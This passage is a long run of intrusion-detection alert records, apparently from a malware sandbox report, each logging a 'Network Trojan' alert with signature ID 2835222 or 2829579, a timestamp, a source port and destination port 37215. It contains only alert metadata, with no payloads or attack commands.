          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.034961
          SID:2835222
          Source Port:57468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.468153
          SID:2835222
          Source Port:49934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.112555
          SID:2835222
          Source Port:51064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355912
          SID:2835222
          Source Port:33512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729868
          SID:2835222
          Source Port:40136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403629
          SID:2829579
          Source Port:40710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704265
          SID:2835222
          Source Port:47468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.460425
          SID:2835222
          Source Port:53132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.787787
          SID:2829579
          Source Port:59492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673173
          SID:2835222
          Source Port:60974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.806402
          SID:2835222
          Source Port:47806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160731
          SID:2829579
          Source Port:56340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709321
          SID:2829579
          Source Port:38960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.894528
          SID:2829579
          Source Port:60082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.464770
          SID:2835222
          Source Port:38330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.107155
          SID:2829579
          Source Port:35170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673806
          SID:2829579
          Source Port:48766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.884243
          SID:2835222
          Source Port:58012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.599687
          SID:2835222
          Source Port:48838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108301
          SID:2835222
          Source Port:47312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471079
          SID:2835222
          Source Port:43722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.168404
          SID:2829579
          Source Port:39540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554364
          SID:2829579
          Source Port:42920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178297
          SID:2829579
          Source Port:51604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242675
          SID:2829579
          Source Port:53538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.276246
          SID:2835222
          Source Port:45390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.150661
          SID:2829579
          Source Port:48552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706390
          SID:2835222
          Source Port:52426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781445
          SID:2835222
          Source Port:53552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.162613
          SID:2829579
          Source Port:37620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.604569
          SID:2829579
          Source Port:57050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.467822
          SID:2829579
          Source Port:41746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272085
          SID:2829579
          Source Port:43238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.601066
          SID:2829579
          Source Port:38620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.893553
          SID:2835222
          Source Port:41190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.192451
          SID:2829579
          Source Port:39522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160207
          SID:2829579
          Source Port:57058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462005
          SID:2835222
          Source Port:53248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.891088
          SID:2829579
          Source Port:52168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.805809
          SID:2829579
          Source Port:42150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.547280
          SID:2835222
          Source Port:55082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.795156
          SID:2835222
          Source Port:33396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.111940
          SID:2835222
          Source Port:43578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.152641
          SID:2835222
          Source Port:53304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.260552
          SID:2835222
          Source Port:58524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729380
          SID:2835222
          Source Port:34042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.792139
          SID:2835222
          Source Port:51090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019912
          SID:2835222
          Source Port:53412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.792754
          SID:2835222
          Source Port:49668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743886
          SID:2829579
          Source Port:59188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729852
          SID:2835222
          Source Port:52170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.749081
          SID:2835222
          Source Port:33402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241175
          SID:2829579
          Source Port:44782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179354
          SID:2835222
          Source Port:47172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.667834
          SID:2835222
          Source Port:55572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.799870
          SID:2835222
          Source Port:58688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.443952
          SID:2829579
          Source Port:54502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.810341
          SID:2835222
          Source Port:47742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.117782
          SID:2835222
          Source Port:40540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.798497
          SID:2829579
          Source Port:48178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.066192
          SID:2829579
          Source Port:55358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.159305
          SID:2829579
          Source Port:53294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.109073
          SID:2829579
          Source Port:33800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.806455
          SID:2835222
          Source Port:44424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.663678
          SID:2835222
          Source Port:38252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.166737
          SID:2829579
          Source Port:52804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730604
          SID:2835222
          Source Port:55912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.057825
          SID:2829579
          Source Port:57570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.268883
          SID:2835222
          Source Port:46208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.467176
          SID:2835222
          Source Port:60666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.261007
          SID:2829579
          Source Port:41946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.107294
          SID:2835222
          Source Port:43318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155194
          SID:2829579
          Source Port:46708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.792354
          SID:2829579
          Source Port:36614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.603143
          SID:2829579
          Source Port:39110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.259166
          SID:2835222
          Source Port:49558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.259984
          SID:2835222
          Source Port:57434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159016
          SID:2829579
          Source Port:42078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178699
          SID:2835222
          Source Port:45050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747496
          SID:2835222
          Source Port:59264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.861220
          SID:2835222
          Source Port:59872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.789526
          SID:2835222
          Source Port:55088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.464919
          SID:2829579
          Source Port:54832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.741034
          SID:2829579
          Source Port:55180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707100
          SID:2829579
          Source Port:50818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351140
          SID:2835222
          Source Port:34304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.129514
          SID:2829579
          Source Port:47760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549787
          SID:2835222
          Source Port:55508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.378044
          SID:2835222
          Source Port:43522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.854587
          SID:2829579
          Source Port:49318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.470419
          SID:2835222
          Source Port:35512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.161831
          SID:2829579
          Source Port:41966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.395955
          SID:2835222
          Source Port:53620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.663754
          SID:2835222
          Source Port:48876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.797211
          SID:2835222
          Source Port:35242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.780760
          SID:2835222
          Source Port:56012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178364
          SID:2835222
          Source Port:56194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.154169
          SID:2829579
          Source Port:60062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.895850
          SID:2829579
          Source Port:55786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671655
          SID:2829579
          Source Port:46524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.514456
          SID:2835222
          Source Port:55546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512490
          SID:2835222
          Source Port:33258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671341
          SID:2835222
          Source Port:57566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.460873
          SID:2835222
          Source Port:55182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353604
          SID:2835222
          Source Port:50174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.800413
          SID:2829579
          Source Port:58518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.127993
          SID:2835222
          Source Port:50254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.515580
          SID:2829579
          Source Port:38344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.844413
          SID:2835222
          Source Port:34468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.099213
          SID:2835222
          Source Port:46284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911893
          SID:2835222
          Source Port:50652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176768
          SID:2835222
          Source Port:38768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407811
          SID:2829579
          Source Port:45498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704570
          SID:2835222
          Source Port:51096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405756
          SID:2835222
          Source Port:59976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.188376
          SID:2829579
          Source Port:57998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.172658
          SID:2835222
          Source Port:58644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.897946
          SID:2829579
          Source Port:42954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.470439
          SID:2835222
          Source Port:41602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.151198
          SID:2835222
          Source Port:52870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356896
          SID:2835222
          Source Port:41796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.895846
          SID:2829579
          Source Port:36026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242640
          SID:2835222
          Source Port:46920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.350785
          SID:2835222
          Source Port:58148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730585
          SID:2835222
          Source Port:58582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.859624
          SID:2829579
          Source Port:43196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449820
          SID:2829579
          Source Port:54958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462376
          SID:2835222
          Source Port:43088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.861737
          SID:2835222
          Source Port:55682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.133738
          SID:2835222
          Source Port:58436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.396267
          SID:2835222
          Source Port:55842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.798654
          SID:2835222
          Source Port:38534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.547805
          SID:2829579
          Source Port:40188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.514967
          SID:2835222
          Source Port:34890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.667482
          SID:2835222
          Source Port:43004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.166643
          SID:2835222
          Source Port:43604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.518070
          SID:2829579
          Source Port:60936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517467
          SID:2835222
          Source Port:51540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.157211
          SID:2829579
          Source Port:59048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.063054
          SID:2829579
          Source Port:41164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731800
          SID:2829579
          Source Port:57930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.897023
          SID:2829579
          Source Port:55964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.731352
          SID:2829579
          Source Port:39832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600580
          SID:2829579
          Source Port:32890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.127012
          SID:2835222
          Source Port:54920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549445
          SID:2829579
          Source Port:57240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.395319
          SID:2829579
          Source Port:50942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.396775
          SID:2829579
          Source Port:34712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.819019
          SID:2835222
          Source Port:47492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.800885
          SID:2835222
          Source Port:60972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.884035
          SID:2835222
          Source Port:54896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512759
          SID:2835222
          Source Port:53012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.798964
          SID:2835222
          Source Port:34488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461875
          SID:2829579
          Source Port:58882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600120
          SID:2835222
          Source Port:37940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.547295
          SID:2835222
          Source Port:44672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.184180
          SID:2835222
          Source Port:54498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242461
          SID:2829579
          Source Port:51300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449292
          SID:2829579
          Source Port:46020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159232
          SID:2829579
          Source Port:41756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353451
          SID:2835222
          Source Port:34388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.237041
          SID:2829579
          Source Port:60692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.887621
          SID:2835222
          Source Port:34660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.180589
          SID:2829579
          Source Port:60258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.275630
          SID:2835222
          Source Port:60518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.260955
          SID:2835222
          Source Port:56820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.897066
          SID:2835222
          Source Port:59698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.448898
          SID:2829579
          Source Port:60882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446490
          SID:2829579
          Source Port:35032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.460747
          SID:2835222
          Source Port:35632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.188230
          SID:2835222
          Source Port:41004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175107
          SID:2829579
          Source Port:60094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.126124
          SID:2829579
          Source Port:42562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554279
          SID:2829579
          Source Port:45340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.150686
          SID:2829579
          Source Port:48914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179400
          SID:2829579
          Source Port:50202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.448724
          SID:2835222
          Source Port:48772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.884209
          SID:2835222
          Source Port:38738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672909
          SID:2835222
          Source Port:38566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.352678
          SID:2829579
          Source Port:39352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.404354
          SID:2829579
          Source Port:58238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.042855
          SID:2835222
          Source Port:44114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781469
          SID:2835222
          Source Port:41952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.306389
          SID:2829579
          Source Port:55198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.897326
          SID:2835222
          Source Port:58448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704128
          SID:2835222
          Source Port:37214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274227
          SID:2835222
          Source Port:46222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356455
          SID:2829579
          Source Port:44288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.460895
          SID:2835222
          Source Port:48372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173749
          SID:2829579
          Source Port:46836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.514306
          SID:2835222
          Source Port:38476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747933
          SID:2835222
          Source Port:41674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.112708
          SID:2829579
          Source Port:34470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705058
          SID:2829579
          Source Port:44088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159812
          SID:2835222
          Source Port:52974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.450066
          SID:2829579
          Source Port:52970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.495775
          SID:2829579
          Source Port:52380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
